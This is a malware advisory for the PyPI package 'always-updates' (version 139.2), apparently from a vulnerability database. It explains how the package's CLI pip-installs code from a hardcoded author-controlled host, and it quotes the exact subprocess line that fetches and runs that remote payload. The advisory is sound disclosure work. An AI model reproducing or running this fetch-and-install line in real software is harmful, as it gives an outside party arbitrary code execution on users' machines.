VYPR
← All malware advisories

pypi · Malicious package advisory

Malware

always-updates

MAL-2026-3685

Malicious code in always-updates (PyPI)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (dee16a964c16035579f7be2f965a801f87876080603f389e1e75ec3073bd5c2c)
The package's sole advertised CLI (`aupd`, registered as a console_scripts entry point to always_updates.__main__:main) executes `subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'https://aupd.19700101t000000z.com'])` (always_updates/__main__.py lines 7 and 16). Running the documented command causes pip to download and install an arbitrary Python distribution from a hardcoded author-controlled endpoint: no version pin, no hash/signature verification, destination is not PyPI nor a documented publisher CDN. Because `pip install <url>` executes the downloaded package's setup.py, this is arbitrary remote code execution against the installer's machine by design, with attacker-mutable content served from the author's host. Corroborating soft signals: the endpoint hostname `aupd.19700101t000000z.com` is an anonymously-registered epoch-zero domain, the author email (`alwaysupdates@sixsixsigma.com`) and referenced GitHub org look theatrical/placeholder — matching the generic-placeholder-metadata-plus-network shape. The harm fires when the user runs the CLI, not at `pip install` time, but the package's entire advertised purpose is to fetch-and-execute whatever the author-controlled server returns; every invocation is a new, unverified remote payload.

Compromised versions (1)

  • 139.2

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.